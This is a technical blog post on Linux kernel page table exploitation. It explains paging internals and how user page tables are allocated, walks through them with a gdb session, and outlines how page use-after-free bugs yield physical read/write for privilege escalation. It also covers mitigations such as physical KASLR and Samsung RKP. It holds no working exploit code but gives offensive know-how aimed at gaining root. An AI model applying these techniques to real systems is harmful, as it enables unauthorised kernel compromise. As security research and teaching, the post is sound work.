Kernel Exploitation Techniques: Turning The (Page) Tables

Two posts in the space of two weeks?! What on earth has gotten into me. Well, I figured I ought to get into the OffensiveCon spirit and get another post on exploitation out there.

So today we'll be looking at (user) page table exploitation. If you've been keeping up with some of the great kernel exploitation research put out there lately (of which I will be sharing plenty of in this article, don't worry!), you might have noticed a trend in techniques targeting page tables in order to gain powerful read/write primitives.

The goal for this post is to provide some insight into why targeting page tables can be such a powerful exploitation technique. We'll do a primer on how paging works in Linux, to give us some context, before looking at how we can gain control of page tables in the first place, how to exploit them for privilege escalation and mitigations to be aware of.

As I mentioned, there's a plethora of great research out there, so where relevant I'll be linking to them so you can take a deeper dive into specific topics or approaches. At the end of the post I'll include a section grouping all the relevant public research together.

So without further ado, let's get stuck in!

Paging Primer
Exploitation
Mitigations
- Physical KASLR
- Read-Only Memory
Resources
Wrapping Up

Paging Primer

he's looking at pages, get it?

Before we get into the nitty gritty of page tables in kernel exploitation, we should probably quickly cover what pages tables are so we understand why exploiting them is so powerful.

Let's pick up where we left off with my three-part series on virtual memory; if you're not familiar with concepts like physical vs virtual memory or the user virtual address space, feel free to check out those posts for a recap before heading into this section.

Okay, so, we have this general idea of the virtual memory model. Let's take the simple example of running a program, which we've touched on previously:

First, the program itself is stored on disk and must be read
It is loaded into RAM, where the physical address in memory is mapped into our process' virtual address space
This "mapping" means that when our program accesses a mapped virtual address, it will be translated into the appropriate physical address so the memory can be accessed

Page tables are what facilitate the translation of virtual to physical addresses. Why "page" tables? Recall that virtual memory is divided into "pages" which are PAGE_SIZE (typically 4096) bytes of contiguous virtual memory; in this case it defines the granularity at which chunks of physical memory are mapped into the virtual address space.

Each process has its own page tables, as does the kernel, to track what parts of its virtual address space are mapped to what parts of physical memory. So how does this work?

Page tables are organised into a hierarchy, or levels, with each table containing pointers to the next level. At the lowest level, the table contains pointers to a page of physical memory. Linux currently supports up to 5 levels^[1]:

Page Global Directory (PGD): Each entry in this table points to a P4D
Page Level 4 Directory (P4D): Each entry in this table points to a PUD
Page Upper Directory (PUD): Each entry in this table points to a PMD
Page Middle Directory (PMD): Each entry in this table points a PT
Page Table (PT): Each entry (PTE) points to a page of physical memory

Note that a lot of systems may still use 4 level page tables. In the event a page table level isn't used (i.e. P4D is only used for 5 level page tables), it is "folded" AKA skipped.

Okay, that sounds fairly straight forward right? And to add to the page-ception, each of these tables is a PAGE_SIZE bytes. But how does these facilitate address translation?

Overview of page table structure (Linux x86_64) by Hiroki Kuzuno, Toshihiro Yamauchi ^[1]

That's where this helpful diagram comes in! Let's unpack it. In the centre we can see a 4-level page table hierarchy, with the PGD on the left and the final page on the right.

Looking up, we have see the bits that make up a 64-bit x86_64 virtual address. We can see that the offsets into each table level, and the final page, are actually stored in the virtual address! Isn't that neat?!

There's a few extra details to note here. First, keen readers might notice that we're actually only using the lower 47 bits of the virtual address! What's that Sign extended portion? As addresses are canonically 64-bits (i.e. that's how they're treated and handled), the remaining bits 48-63 are sign extended (i.e. copy) bit 47.

This bit is important, as it denotes if an address is a low address (for userspace) or a high address (for the kernel virtual address space). Don't believe me? Compare a kernel and userspace address on your x86_64 machine and you'll always see those bits set/unset.

Some more useful bits (figuratively speaking) worth mentioning are that:

Page table entries aren't just pointers to the next level/memory, they can also contain important metadata like permissions (spoiler alert).
It's not just PTEs that can point to physical memory. There's a concept of huge pages, whereby a PMD points to a huge page of physical memory (a bit out of scope for this).
The kernel's page tables are setup at boot time. A process' page tables are setup when it's created. It used to be the case that the kernel's page tables were copied into each process' tables (remember, they span a mutually exclusive virtual address range).
However, since Meltdown (2018) and speculative execution side-channely shenanigans, Kernel Page Table Isolation (KPTI, CONFIG_PAGE_TABLE_ISOLATION / CONFIG_MITIGATION_PAGE_TABLE_ISOLATION) was introduced. This removes the kernel mappings from userspace, switching to a separate page table will all the mappings when entering "kernel mode" (i.e. during a syscall, interrupt).

I'll touch on all of this in much more detail in the next instalment of my memory management linternals series, but there's also plenty of great resources out there^[1][2].

Exploitation

Alright, now we're getting to the fun part! Given what we know about paging in the Linux kernel, we can start to understand why page tables present such a powerful exploitation target.

Gaining control over even a single PTE (or PMD entry, as this could be a huge page) means not just having control over the access permissions for that virtual memory mapping but also the physical address it maps to.

When we think of Kernel Address Space Layout Randomisation (KASLR), we're typically thinking about the virtual address of the kernel. Physical KASLR is slightly different and may not always be present (in the case of upstream aarch64) or weaker.

Therefore, control over a PTE belonging to our process essentially grants us an arbitrary physical address read and write, granting control over the kernel while also bypassing mitigations that hinder other techniques.

But of course, this is all easier said than done! First we have to control a PTE...

So we have a target in mind for corruption: page tables. In order to realise that goal, we need to consider:

How page tables are allocated by the kernel, so we know what kind of corruption primitive we need to corrupt them
Are there generic approaches to gain a page table corruption primitive?
How do we want to leverage our page table corruption for local privilege escalation?

User Page Table Allocation

If we want to consider memory corruption, we need to understand how page tables are allocated. As the kernel's page tables are setup during boot-time, this section will just focus on how user page tables (i.e. for a userspace process) are allocated.

I'll save the deep dive for linternals and cut to the chase. User page tables are by default allocated on demand: whenever a virtual address is accessed (read or written) and has a valid physical memory mapping, any missing page tables will be allocated and populated.

We can use some maths to guarantee this. Recall that each page table is PAGE_SIZE bytes. On a 64-bit system, entries are 64-bits. That means each page table has 4096 / 8 = 512 entries. We can then work out the virtual address range of each page table level:

PTE-level table: Each of the 512 entries points to PAGE_SIZE bytes of physical memory. Therefore it spans 512 x 4096 = 2097152 = 0x200000 = 2MB.
Page Middle Directory (PMD): Each entry spans 2MB. An entry may point to a PT or a 2MB block of memory (a huge page). The PMD itself spans 0x40000000 = 1GB
This continues with the PUD spanning 512GB, the PGD spanning 256TB.

We can infer from this that the virtual address of the first entry of a PTE-level table is aligned to 0x200000. If we mmap() a page of anonymous memory to a fixed address, aligned to this value we can determine a few things:

This virtual address' mapping will be the first entry in its PTE-level table
If there haven't been any other mappings in this page table (i.e. for the next 0x200000 - 0x1000 bytes), then this page table hasn't been allocated yet. Thus, accessing (read/writing) this mapping will cause it to be allocated.

Another quirk to note is that mmap() can be passed the MAP_POPULATE flag to populate the necessary page tables at the time the mapping is created.

With that mildly relevant tangent out of the way, let's look at some code. Due to the tight integration with the hardware, some of the page table handling code is architecture specific. For x86_64 our trail starts here:

gfp_t __userpte_alloc_gfp = GFP_PGTABLE_USER | PGTABLE_HIGHMEM;

pgtable_t pte_alloc_one(struct mm_struct *mm)
{
	return __pte_alloc_one(mm, __userpte_alloc_gfp);
}

arch/x86/mm/pgtable.c

Note the GFP flags used: GFP_PGTABLE_USER | PGTABLE_HIGHMEM. A few calls deeper we then get to the asm-generic implementation, pagetable_alloc_noprof():

/**
 * pagetable_alloc - Allocate pagetables
 * @gfp:    GFP flags
 * @order:  desired pagetable order
 *
 * pagetable_alloc allocates memory for page tables as well as a page table
 * descriptor to describe that memory.
 *
 * Return: The ptdesc describing the allocated page tables.
 */
static inline struct ptdesc *pagetable_alloc_noprof(gfp_t gfp, unsigned int order)
{
	struct page *page = alloc_pages_noprof(gfp | __GFP_COMP, order);

	return page_ptdesc(page);
}

include/asm-generic/pgalloc.h (used for PTs, PMDs and PUDs)

As we can see user page tables are allocated using the page allocator, with GFP flags GFP_PGTABLE_USER | PGTABLE_HIGHMEM | __GFP_COMP. Okay, one step closer!

Now we know we're dealing with the page allocator. This means that if we want to use a memory corruption primitive to control a page table, we need to have some control over a similarly allocated page from the same allocator. Let's explore this a bit:

GPUAF slides by PAN ZHENPENG & JHENG BING JHONG

Above is a diagram showing some page allocator internals. Recall that the page allocator manages chunks of physically contiguous memory by order, where the size of the chunk is 2^order * PAGE_SIZE.

Free memory chunks are managed by the free_area list, whose index is the order of the free chunks of memory it manages. Each order then has a free_list for each of the MIGRATE_TYPES, which points to the actual memory chunks. Working our way back you'll then notice each zone has it's own free_area list... Not to mention each CPU maintains its own per-CPU page cache... So yeah, that's a lot.

This means when we're doing any kind of page allocator-level corruption we need to be aware of all the variables: the CPU cache, zone, migrate type etc.

In our situation: Our page table is PAGE_SIZE bytes, so a single order 0 page. The GFP flags determine the zone and migrate type. Let's quickly walk through those:

GFP_PGTABLE_USER after peeling back the macros is __GFP_RECLAIM | __GFP_IO | __GFP_FS | __GFP_ZERO | __GFP_ACCOUNT. No __GFP_RECLAIMABLE|__GFP_MOVABLE means no MIGRATE_MOVABLE^[3].
PGTABLE_HIGHMEM is effectively 0 unless CONFIG_HIGHMEM is set.
__GFP_COMP is for compound pages^[4], but doesn't effect our zone/migrate type.

So to sum it all up: page tables are order-0 pages allocated by the page allocator, from ZONE_NORMAL, MIGRATE_UNMOVABLE.

Page Table Corruption?

Okay, we know what page tables are, why they're powerful targets for exploitation and now we also know how user page tables are allocated - so how do we get control of one?!

The vulnerability research gods are fickle ones and we're often at the whims of the primitives we're given. So let's explore a few cases and how we might leverage them to get control of a page table.

Page-Level Primitives

By far the "easiest" way would be if we had a nice order-0 page use-after-free (UAF), with suitable zone and migrate types. In this scenario, we could do some classic memory fengshui to have our page reallocated as a page table.

Even if it wasn't an order-0 page, due to the buddy algorithm, if we exhaust the order-0 pages the allocator will split order-1 pages, if they're exhausted then order-2 and so on. A similar technique could be used to exploit a page allocator level out-of-bounds write (OOBW), by having our OOBW source page allocated adjacent to our page table.

I thought I'd share some cool public research demonstrating this, funnily enough page-level UAFs aren't too common, so both examples are from GPU bugs:

GPUAF - Two ways of Rooting All Qualcomm based Android phones (aarch64)
The Way to Android Root: Exploiting Your GPU On Smartphone (aarch64)

What About Other Primitives?

But what if we don't have a nice page-level UAF? What if we've got a run of the mill SLAB allocator-level UAF? Is there any hope for us?! Yes!

As an avid reader of my linternals series, I'm sure you'll remember that the slabs used by the SLAB allocator are in fact themselves allocated by the page allocator!

Therefore, if our UAF object is within a slab, perhaps we can cause this slab to get freed, returned to the page allocator and reallocated as a user page table?! We'd need to be mindful of the slabs order (aka size) and what write primitives we can get with our UAF in order to corrupt the page table's contents, but it's certainly do able.

How do I know? Because this is the crux of the Dirty Pagetable technique published by @NVamous back in 2023. This writeup details pivoting several vulnerabilities into page UAFs in order to gain control over user page tables, so check it out for more details!

In a similar vein, PageJack was published in 2024 (Phrack article, BlackHat slides) by Jinmeng Zhou, Jiayi Hu, Wenbo Shen & Zhiyun Qian. This technique also aims to provide a generic approach to gain a page UAF, by pivoting our initial primitive to induce the free of specific "bridge objects" which when freed cause a page UAF.

Below are some more writeups demonstrating these techniques:

"Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup" by @ptrYudai (x86_64) (2023)
"Flipping Pages: An analysis of a new Linux vulnerability in nf_tables and hardened exploitation techniques" by @notselwyn expands on the Dirty Pagetable technique (x86_64) (2024)

Exploiting A Page UAF?

The pieces are finally aligned: we know what page tables are, why they're a big deal and now we even know how to get control of them ... but what do we do with all this power?!

As I mentioned earlier, we're often at the whims at whatever bug the VR gods have tossed our way, so each bug is going to have its own quirks. Maybe you have an 8 byte arbitrary write or maybe you only have control over a single bit. While I can't cover all eventualities, hopefully this section provides enough information to figure it out.

So we have a, either directly or through some technique, gained a page UAF, had that page reallocated as a user page table (for our process) and as a result have the means to corrupt all or some portion of the page table - what's next?

PT Entries

First things first, we want to understand what we're corrupting - what does our page table actually contain? Sure, it maps a specific page of virtual memory to a physical address, but what does this involve?

x86_64 PT Entry from OSDev.wiki

Above is a diagram of what an 8 byte PT entry looks like on x86_64. Here M is the maximum physical address bit, i.e. how many bits are used for addressing. As we touched one earlier, this isn't actually 64, but a small value such as 47.

So this is a pretty smart use of space. As we know, these entries map pages in memory (i.e. PAGE_SIZE bytes of memory), so all addresses are page aligned. With a page size of 0x1000, this means the lower 0-11 bits are always going to be zero, so they can be used for metadata! Similarly, anything above the maximum address bit can be used for metadata.

Remember, this user page table corresponds to a portion (a 2MB portion specifically) of our processes' virtual address space. So we're interested in:

The address bits, which control the physical page in memory that the virtual address corresponding to this entry will map to when accessed by our process.
The permission bits, particularly if we map a read-only file (such as an SUID binary or system library) into the virtual address range covered by this page table.

Huge Pages

As we've touched on, PMDs and PUDs are allocated the same way as PTs - via the page allocator. So it is also feasible we could target one of these for our page-UAF.

Albeit, in their default usecase, this would be less practical than corrupting a PT. A PT would let us direct a virtual address to an arbitrary physical address, but PMD and PUD entries point to other tables ... Apart from huge pages!

x86_64 PUD, PMD and PT Entry from OSDev.wiki

The above diagram shows the formatting for x86_64 PUD, PMD and PT entries. Both the PUD and PMD entries include a Page Size (PS) attribute. If this bit is set, it is treated as mapping to a huge page of physical memory, who size is appropriate for the page-level.

As we covered earlier, for a PMD this is 2MB and for a PUD it's 1GB. As the physical addresses are aligned to the value of the physical mapping, we can see the PMD entry has even less address bits than the PT entry and the PUD even less than the PMD.

Going For A Walk

So far this has been all quite abstract, so, if you'll indulge me, let's go for a quick (page table) walk. We'll take all the paging internals we've picked up so far to do some debugging in order to get some hands on and confirm what we've learned.

For our little walk, I'm going to use the following program to setup an interesting virtual address space to explore via kernel debugging:

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

#define PAGE_SIZE (0x1000UL)
#define PT_SIZE (512 * PAGE_SIZE) // 0x200000
#define PMD_SIZE (512 * PT_SIZE)  // 0x40000000
#define PUD_SIZE (512 * PMD_SIZE) // 0x8000000000
#define PGD_SIZE (512 * PUD_SIZE) // 0x1000000000000

int main()
{
    int fd = open("test.txt", O_RDONLY);

    mmap((void*)PUD_SIZE + PMD_SIZE + PT_SIZE, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED | MAP_POPULATE, -1, 0);
    mmap((void*)PUD_SIZE + PMD_SIZE + PT_SIZE + PAGE_SIZE, 0x1000, PROT_READ, MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED | MAP_POPULATE, -1, 0);
    mmap((void*)PUD_SIZE + PMD_SIZE + PT_SIZE + PAGE_SIZE + PAGE_SIZE, 0x1000, PROT_READ, MAP_PRIVATE | MAP_FIXED | MAP_POPULATE, fd, 0);

    getchar(); // pause program so i can set a bp to trigger on the next mmap()
    mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);

    return 0;
}

Note: MAP_POPULATE is used to make sure the tables are populated on mmap()ing them

The aim of this little program is to create three mappings, with slightly different permissions and attributes, at a fixed location. Why a fixed location?

Because as we've learned, the virtual address space is directly reflected by it's page tables. So by using a fixed address we can calculate exactly which PT our page entries will be.

To make this a little easier, I created some macros to define the size each page table level spans. So, as the virtual address space is reflected directly by the page tables, we know that virtual address 0x0 is going to be mapped by PGD[0][0][0][0] - where the first index is the PGD entry, then that PUD entry, that PMD entry and finally that PT entry.

So if we map at fixed address PUD_SIZE + PMD_SIZE + PT_SIZE we're offsetting it by example one PUD, one PMD and one PT. So we should find it at PGD[1][1][1][0].

We can also do it the technical way and explore the bits of the address. PUD_SIZE + PMD_SIZE + PT_SIZE == 0x8040200000. Let's check out the bits:

Bit:  63 62 61 60 59 58 57 56 55 54 53 52 51 50 49 48 47 46 45 44 43 42 41 40 39 38 37 36 35 34 33 32
Val:   0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  1  0  0  0  0  0  0  0

Bit:  31 30 29 28 27 26 25 24 23 22 21 20 19 18 17 16 15 14 13 12 11 10  9  8  7  6  5  4  3  2  1  0
Val:   0  1  0  0  0  0  0  0  0  0  1  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0

In the paging primer earlier we showed that the entry offsets for the PGD, PUD, PMD, PT were stored in bits 39-47, 30-38, 21-29 and 12-20 respectively. Here we can see those values correspond to 1, 1, 1 and 0. The same as our previous guess!

Note that the next two mappings are each offset by PAGE_SIZE, i.e. one PT entry, so they should form 3 contiguous PT entries.

This is all still theoretical though so let's put out money where our mouth is. I set up a kernel debugging environment using gdb and x86_64 QEMU. The plan is to:

Run this program on the guest
When it pauses at getchar(), set a breakpoint in gdb at vm_area_alloc(mm)
Continue the program, hit the breakpoint. We now, lazily, have a reference to our processes mm_struct which contains a pointer to its PGD. We can now walk our PGD and find out entries!

And, just like that we can dump our processes PGD:

(gdb) x/10gx mm->pgd
0xffff888106b50000:     0x8000000100172067      0x8000000102c9b067
0xffff888106b50010:     0x0000000000000000      0x0000000000000000
0xffff888106b50020:     0x0000000000000000      0x0000000000000000

Great, so far so good. We can see PGD[1] is populated with 0x8000000102c9b067. To find the address of the PUD this entry points to, we need to clear the metadata. This, for us, is bits 0:11 and 48:63. We can remove this with a simple mask: 0x8000000102c9b067 & 0x0000FFFFFFFFF000 = 0x102C9B000.

Awesome, so now we can move onto our PUD...

(gdb) x/10gx 0x102C9B000
0x102c9b000:    Cannot access memory at address 0x102c9b000

Ah wait, that's a physical address right, and gdb is dealing with virtual addresses. Not to worry! Fortunately, the kernel virtual address space includes a direct mapping of all physical memory (physmap). For x86_64 this at __PAGE_OFFSET, 0xffff888000000000.

Sooo if that's the kernel virtual address mapped to the start of physical memory, we just need to offset that by our physical address and we should see our PMD...

(gdb) x/2gx (0xffff888000000000 + 0x102c9b000)
0xffff888102c9b000:     0x0000000000000000      0x000000010436d067

Voila! And again, as expected, we have our entry at PGD[1][1]. Let's keep going:

(gdb) x/2gx (0xffff888000000000 + (0x000000010436d067 & 0x0000FFFFFFFFF000))
0xffff88810436d000:     0x0000000000000000      0x0000000101346067

Now we're into the PMD and as expected, we see PGD[1][1][1] populated. The next step is the PT, where we should see three entries with slightly different permissions:

(gdb) x/4gx (0xffff888000000000 + (0x0000000101346067 & 0x0000FFFFFFFFF000))
0xffff888101346000:     0x8000000107422067      0x80000000034ff225
0xffff888101346010:     0x800000010743c025      0x0000000000000000

And just like that we've walked our mm's PGD all the way down to a specific PT, containing our 3 mappings: R/W anonymous mapping, RO anonymous mapping and finally a RO file. Sweet!

I'll leave the examining of the various attributes, using the PTE diagram from the previous section, as an exercise to any interested readers, as I fear I've sidetracked enough. The main goal of this little adventure is to demonstrate how you can get some hands on debugging and poke around to help build your understanding, as it can be vital when working on complex exploitation techniques like this!

Now, where were we - weighing up our options for exploitation if we have some level of control over a page table...

Approaches

So, depending on our primitive, here a couple of options we might consider:

Overwriting the address bits (and maybe Page Size bit for PUD/PMD entries) to gain arbitrary physical address R/W (note, we'll discus phys KASLR later).
Overwriting permissions bits to gain R/W on a privileged file that is mapped into our processes virtual address space as read-only.

Using our kernel AAW we could: disable SELinux, using one of the techniques outlined here, such as overwriting the selinux_state singleton^[3]^[4]; patch the kernel to gain root (e.g. setresuid(), setresgid())^[5]^[6]; overwrite modprobe_path because that's sometimes still a thing^[7]; following the linked lists of tasks from init_task to elevate the privilege of your own creds or forge init's etc. The world is our oyster (if our primitive is flexible enough...)!

As for files we might want to target, we could: patch shared libraries used by privileged processes to gain a reverse shell^[8][9][10]; patch SUID binaries to gain a privileged shell etc.

On Caching

Before we get giddy with power, beyond the limitations of our primitive, there a few other things to consider: mitigations (which I'll cover in the next section) and caching.

So far we've covered paging at a reasonably high level: the process of translating a virtual address to the correct physical address involves walking the appropriate page tables using the bits found in the virtual address.

This address translation is offloaded to the hardware and is the job of the Memory Management Unit (MMU). As you might imagine, this can get computationally expensive when you scale things up and also inefficient if we're constantly accessing the same pages of memory.

To address this, the hardware makes use of various caches, storing address translations (the primary cache for this being the Translation Lookaside Buffer (TLB)) and pages.

If we start messing with page table entries or pages, in order for the hardware to actual see these changes, we need to flush the appropriate caches so they're updated with our version.

Of the write-ups I've mentioned so far, the Dirty Pagetable article has a section on this for aarch64 and Flipping Pages article has a section rel to x86_64.

Mitigations

Alright, we've had our fun, now it's time to face reality: mitigations. Of course, one of the perks of page table exploitation is that it sidesteps more common mitigations: virtual KASLR, CFI, doesn't need modprobe_path, random kmalloc caches and other heap mitigations; not to mention the permissions setup by page tables to protect memory acceses via virtual addresses. However, that's not to say there's nothing to worry about.

Physical KASLR

As I mentioned earlier, usually when we're talking about Kernel Address Space Layout Randomisation (KASLR), we're referring to kernel virtual address randomisation. However, as we're dealing with physical addresses, we're interested in physical KASLR.

CONFIG_RANDOMIZE_BASE is the kernel config option that enables randomising the address of the kernel image (KASLR). Below is the description for the x86_64 option:

In support of Kernel Address Space Layout Randomization (KASLR), this randomizes the physical address at which the kernel image is decompressed and the virtual address where the kernel image is mapped, as a security feature that deters exploit attempts relying on knowledge of the location of kernel code internals.

On 64-bit, the kernel physical and virtual addresses are randomized separately.

Now, let's look at the aarch64 description:

Randomizes the virtual address at which the kernel image is loaded, as a security feature that deters exploit attempts relying on knowledge of the location of kernel internals.

As far as I understand it, there is no upstream support for physical KASLR on aarch64. That said, if you're on Android, you're not out of the woods yet - Samsung have their own physical KASLR implementation, so don't stop reading just yet.

For x86_64, the kernel's physical base address is aligned to CONFIG_PHYSICAL_START (default being 0x1000000). However, the physical address alignment can be explicitly defined by CONFIG_PHYSICAL_ALIGN, which is typically set to 0x200000 (which is the minimum value on x86_64).

Sooo how we approach this is going to be dependent on our primitive and whether we have control of a PT, PUD, PMD etc. But failing any context specific leaks, the most straightforward approach is simply brute forcing the available physical memory, taking advantage of alignment restrictions, reading the possible base addresses for known signatures either by updating PT entries or mapping huge pages of physical memory and doing it that.

Read-Only Memory

Another mitigation that can thwart our page-level shenanigans is the use of read-only memory. But Sam, I hear you ask, we're dealing directly with physical addresses here, who's going to stop us?! As we've mentioned, typically these protections are done during virtual address translation, but we're bypassing that, so what gives?

An example of this is Samsung's Real-time Kernel Protection (RKP), a hypervisor implementation which is part of Samsung KNOX. I don't want to get too off track here, but essentially the hypervisor runs at a higher privilege level than even the kernel.

Moreover, it uses a 2 stage address translation to control how the kernel (and thus we) see physical memory. This essentially allows the hypervisor to mark memory as read-only so that even with our physical address read/write, it can still be caught by the hypervisor as it's operating at a higher privilege. This is a gross simplification, so if you're interested in reading more, checkout the awesome Samsung RKP Compendium.

This can in turn be used to protect critical data structures such as SLAB caches (e.g. cred_jar), global variables, kernel page tables etc.

Note this isn't currently used (afaik) to protect user page tables, but it does narrow down the options available when exploiting the physical address read/write.

Resources

Below is a list of all the resources I've linked throughout the articles and any extras that are relevant to the topic of page table exploitation (if you think I've missed any, lmk!):

Dirty Pagetable: A Novel Exploitation Technique To Rule Linux Kernel by @NVamous (2023) (aarch64) technique overview with 3 examples
"Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup" by @ptrYudai (2023) (x86_64) exploit write-up
"Flipping Pages: An analysis of a new Linux vulnerability in nf_tables and hardened exploitation techniques" by @notselwyn (2024) (x86_64) exploit write-up that expands on the Dirty Pagetable technique, covers phys KASLR bypass, cache flushing
PageJack (Phrack article, BlackHat slides) (2024) technique overview
GPUAF - Two ways of Rooting All Qualcomm based Android phones (2024) (aarch64) exploit slides
The Way to Android Root: Exploiting Your GPU On Smartphone (2024) (aarch64) exploit slides
CVE-2022-22265 Samsung npu driver (2024) (aarch64) exploit write-up that includes bypasses for Samsung DEFEX
Mali-cious Intent: Exploiting GPU Vulnerabilities (CVE-2022-22706 / CVE-2021-39793) (2025) (aarch64) Mali GPU exploitation; demonstrates injecting hooks and payloads into read-only shared libraries

RE internals and more background reading:

Page Tables - Linux Kernel Docs are a good place to start on fundamentals
Checkout my linternal series for rundowns on page allocators and mm basics
A Quick Dive Into The Linux Kernel Page Allocator (2025) is a great look into the kernel's page allocator

Wrapping Up

Boom, we did it! This has been a fun one to write, hopefully it's, if not fun, been a helpful read for anyone curious about the current trend of page table exploitation.

It's part of the broader cat and mouse game of security research, as mitigations catch up and become more widespread, attackers need to get more creative in bypassing or circumventing them completely. Often, this means going deeper and deeper into the internals. As we've seen, by exploiting page tables and using physical memory addressing, we're essentially able to operate "under" the purview of traditional mitigations, such as the permission accesses done at the virtual address level.

That said, it's not quite the wild west, as, while not wide spread, mitigations for these techniques do exist. So I wonder where the next stop will be in this mitigations race!

If you're interested in digging deeper into page table internals, specifically with regards to kernel code and implementation, I'll be touching on that in the next part of my mm series.

As always feel free to @me (on X, Bluesky or less commonly used Mastodon) if you have any questions, suggestions or corrections :)

Contents